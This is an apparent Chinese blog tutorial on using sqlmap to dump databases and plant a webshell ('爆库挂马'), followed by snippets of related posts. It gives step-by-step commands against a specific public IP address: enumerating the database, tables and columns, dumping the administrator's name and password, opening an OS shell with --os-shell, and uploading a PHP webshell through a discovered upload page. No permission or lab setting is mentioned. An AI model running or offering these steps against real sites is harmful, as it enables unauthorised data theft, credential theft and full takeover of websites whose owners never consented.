如何使用sqlmap爆库和挂马

最新推荐文章于 2024-07-20 18:38:43 发布
最新推荐文章于 2024-07-20 18:38:43 发布
阅读量2.3k 收藏 10
点赞数 2
文章标签: linux 运维 服务器 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Leslieyzz/article/details/128731282
版权

这篇文章讲述一下sqlmap的基本使用,爆库挂马

安装sqlmap:

kali:kali里面是自带sqlmap的,我们开启root用户就可以使用

 windows:

(1)安装python并配置环境Python Releases for Windows | Python.org

(2)sqlmap到官网下载即可sqlmap: automatic SQL injection and database takeover tool,下载好的文件解压放在sqlmap文件夹中。(自己选择位置即可)

(3)如何打开sqlmap:①管理员打开CMD②使用CD命令进入到sqlmap文件夹中

③此时输入命令即可(命令和linux的区别就是 windows前面是sqlmap.py 而linux前面是sqlmap)

爆库:

 我们以kali的sqlmap为例

1、进入管理员root用户

2、首先找到目标网站的可注入点

一般URL带有“php?cid=XXX”传参的很有可能能存在漏洞,我们扫描这个URL

3、爆库名

命令  sqlmap -u "http://43.138.211.45/news.php?cid=1" --current-db

 中途出现一下,敲击回车即可

 最后我们可以找到库名为 510cms

4、爆表名

命令 sqlmap -u "http://43.138.211.45/news.php?cid=1" -D 510cms --tables

在下面可以找到爆出来的表名

5、爆列名

我们爆管理员admin的表,找到管理员账户及其密码

命令  sqlmap -u "http://43.138.211.45/news.php?cid=1" -T 510_admin --columns

可以找到有许多列

我们查看一下name和passwd

命令 

sqlmap -u "http://43.138.211.45/news.php?cid=1" -D 510cms -T 510_admin -C name,passwd --dump

中途停止按回车即可

结果,成功获得管理员用户名和密码!

挂马:

 1、探测有没有上传路径

命令  sqlmap -u "http://43.138.211.45/news.php?cid=1" --os-shell

出现,询问你探测的网站是什么web server支持的

 这个网站是PHP网站,我们输入4然后回车

询问你,想对可写目录使用什么

 我们选择2自定义位置,输入2然后回车

 

 需要提供一个绝对目录路径列表

我们可以登录到网站管理后台找到网站的目录,此网站是 /var/www/html

输入后回车,出现os-shell,此时已经可以使用部分linux命令来对网站进行操作了

我们在上图中可以看到扫描出来了一个上传路径

我们可以用浏览器访问一下,http://43.138.211.45:80/tmpukuzx.php

 发现可以上传文件!我们上传一个PHP大马

直接点击浏览然后upload上传,找到自己电脑的大马路径即可

 上传成功,我们在浏览器中打开PHP大马,在URL中输入大马的路径和文件名称

 然后登陆成功

 然后就可以对网站进行操作了!

注意事项:

1、保证kali可以联网

 

 

 

 

于 一
关注
  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入爆库渗透测试(初学者必看)
yi152787的博客
04-30 1927
爆库原理基本一致的,也许站点不同但只要存在sql注入则需要进行数据库破,步骤及使用的参数基本相同,对参数不够熟悉的网友可以去某百某博查看相关信息,本次实验结束,本文章仅提供参考,请勿在未授权的情况下进行测试。本次实验利用sqlmap破工具对SQL靶场进行渗透测试(数据库破),最终目标:拿到用户名和密码,实验中页面出现的用户名密码可忽略,真实实战中一般不会直接出用户名和密码的。5.在security出users,已确定目标所在,进行第三步破 所使用到的参数 -D -T --colimn;
sqlmap工具说明
tlucky的博客
03-06 1662
版本:v1.4.10支持环境:windows,linux等支持语言:python设计目的:可自动执行SQL注入缺陷的检测和开发过程,并接管数据库服务器实现:有强大的检测引擎,针对不同类型的数据库提供多样的渗透测试功能选项,实现数据库识别、数 据获取、访问DBMS\操作系统甚至通过带外数据连接的方式执行操作系统的命令。,以及从数据 库指纹识别、从数据库获取数据、访问底层文件的广泛范围的交换机通过带外连接在操作系统上 执行命令。
爆库原理剖析
三朝看客
07-18 2084
一、方式 暴库的方式有多种多样,我知道的就有3种以上,常见的暴的方法有:%5c类暴,conn.asp暴,ddos暴等等 二、原理 “%5c"暴库法,它不是网页本身的漏洞,而是利用了IIS解码方式中的一个特性,如果IIS安全设置不周全,而网页设计者未考虑IIS错误,就会被人利用。   为何要用”%5c"?它实际上是"“的十六进制代码,也就是”"的另一种表示法。在电脑中,它们是一个东东。 但提交"“和...
在kali上使用sqlmap进行
learninger12的博客
02-13 6297
sqlmap进行破 接下来看一下sqlmap的版本: 我们进行破的时候,一定要找有注入点的,比如这样的: 再来一个没有注入的,来做一下对比: 这里我们就可以看的出来,在地址栏中,我们会发现,有注入的,在网址的最后面会有一些不同的东西,没有注入的就没有东西,我们要找的就是有注入的东西,这样我们才能对网站进行破,下面进行破,获取网站的一些基本信息: 看上图的下方区域,我们可以清楚的看到一些基础信息,这里就不过多的解释了。 接下来是查...
Sqlmap 随记
orchid_sea的博客
04-27 761
sqlmap安装 linux环境下键入命令 apt install sqlmap 老师说,如果遇到如图问题,把文件删掉重新安装就好了;但是呢,按照这个方式我没有解决掉。 那就重新安装sqlmap和依赖库吧: 按照提示,先更新一下apt工具 apt-get update 工具更新完再安装sqlmap 安装完就能成功进入sqlmapsqlmap GET注入 sqlmap -u "http://192.168.181.1/pikachu-master/vul/sqli/sqli_str.php?name=a
Web安全开发:SQL注入攻击和网页
ccc77的技术资料库
01-28 595
申明。文章仅代表个人观点,与所在公司无任何联系。 1.     概述网页这个话题想来大家并不陌生。为什么有这么多的网页上存在着木去攻击普通用户?不可否认,相当一部分网页原本就是恶意的:网页的作者故意在上面放上木,然后通过各种手段引诱用户去浏览。但是绝大多数被的网页原本是正常的网页,例如普通的教育网站,购物网站等等,只是网页被攻击者恶意修改后插入了木代码。那么,攻击者是
Sqlmap入门爆库表、字段、记录
weixin_56306210的博客
10-31 2231
Sqlmap爆库表、字段、记录
SQLMAP使用笔记.pdf
01-25
下面是 SQLMAP使用笔记,包括常用参数、选项和示例。 一、SQLMAP 的基本使用 SQLMAP 的基本语法为:`sqlmap -u <url> [options]` 其中,`-u` 选项指定了要测试的 URL,`[options]` 是可选的参数和选项。 二、...
Sqlmap使用手册中文版
01-13
用户手册详尽地介绍了Sqlmap的所有选项和开关,提供了丰富的实例,帮助用户理解和掌握如何有效使用这个工具。 当进行Web应用审计时,如果发现页面中的参数(如GET、POST或Cookie)可能受到用户输入的影响,Sqlmap...
SQLMAP神器使用.pdf
01-05
以下是对SQLMap使用的一些关键知识点的详细解释: 1. **安装与环境配置**: - 首先,需要确保已安装Python 2.7版本,因为SQLMap主要支持这个版本。 - 解决Python 2.7和Python 3之间的版本冲突,避免它们互相干扰...
SQL注入技巧-盲注暴库详细技巧及实例
10-11
个人通过拜读各位前辈们的博文以及大量的ctf题目训练,结合挖洞经验整理的几点sql常用的盲注技巧,结合具体的sql指令加深理解,针对常用的防护技术,总结了几种通用的绕过技巧
使用sqlmap+burpsuite进行中级sql注入
06-01
本篇将详细介绍如何结合sqlmap和BurpSuite工具进行中级SQL注入的实战操作。 首先,我们需要了解sqlmap和BurpSuite的基本功能。sqlmap是一款自动化SQL注入工具,它能自动检测和利用SQL注入漏洞,获取数据库信息。...
sqlmap使用说明.pptx
04-02
介绍了 渗透测试工具 sqlmap使用方法。 对sqlmap -tamper 脚本的使用进行了演示。 burpsuite中sqlmap的插件进行了简单的介绍。
SQL盲注之python脚本破及sqlmap基础操作
wangringyi的博客
04-09 6136
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、SQL盲注是什么? 二、介绍与使用 1.盲注的三种分类 2.基于报错的盲注 3.基于时间的脚本化盲注 sqlmap使用 前言 哈,我是爱挖洞的萝卜头,从今天开始来csdn分享学习过过程,学习经历,望各位大佬指教指教,嘿嘿嘿。 一、SQL盲注是什么? 经历过前面的数字型注入,字符型注入,提交方式注入等,我们对sql注入有了基本的...
萌新挖到sql注入漏洞的过程全记录
qq_42468569的博客
11-02 1845
挖sql注入漏洞萌新记录
2018-10 第一次DVWA靶机破SQL注入漏洞记录(GET方法,使用SQLMAP、任意抓包工具)
昨天今天下雨天的博客
10-29 2359
首先进入DVWA,调整安全级别为low。 打开SQL Injection页面,ID栏输入1 因为DVWA需要登录,所以使用Burp Suite抓包,包里包含了cookie。 将抓包内容保存至本地(/root/test) 打开终端,输入: sqlmap -r /root/test --current-db   ,根据包里的内容猜解当前数据库,可以不加--current-db以...
SQL注入之爆库利用方法
afei001
04-23 1067
爆库 定义:通过一些技术手段或者程序漏洞得到数据库的地址,并将数据库非法下载到本地。黑客在得到网站数据库后,就能得到网站管理账号,对网站进行破坏与管理,同时黑客也能通过数据库得到网站用户的隐私信息,甚至得到服务器的最高权限。 爆库利用方法(百度已屏蔽,最好用google) 1.inurl:/inc/conn.asp afei 2.inurl:/inc+co...
爆库漏洞全解
网络小虾
08-21 2095
用挖掘鸡找到网站漏洞,很多网站不修改默认数据库: 文件名:dvbbs6.mbd、dvbbs7.mbd 目录组:/data、/databackup 关键词:dvbbs 动网论坛 欢迎 许愿版漏洞: 文件名:wish.asp 目录组:/wish 关键词:许愿版 爆库漏洞:暴库一般加%5c或者inc,让系统调用数据时出现错误,然后返回数据库提示调用数据出现错误,错误数据里面一般含有数据库...
Linux:基础命令学习
最新发布
qq_55038440的博客
07-20 1153
实例:-F根据文件类型在列出的文件名称后加一符号。实例: -R 递归显示目录中的所有文件和子目录。. 开头的隐藏文件也会列出。可执行文件则加 "*",用于显示目录文件信息。
sqlmap爆库表名post
09-20
使用sqlmap工具可以进行数据库爆库表操作。首先,通过运行以下命令可以当前数据库的名称和用户名: ``` sqlmap -r "post1.txt" --current-db --current-user ``` 然后,可以使用以下命令来当前数据库中的表名: ``` sqlmap -r "post1.txt" --tables -D <数据库名称> ``` 其中,`<数据库名称>`是前一步中出的数据库名称。 请注意,这是一个示例命令,具体使用时需要根据实际情况进行修改。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值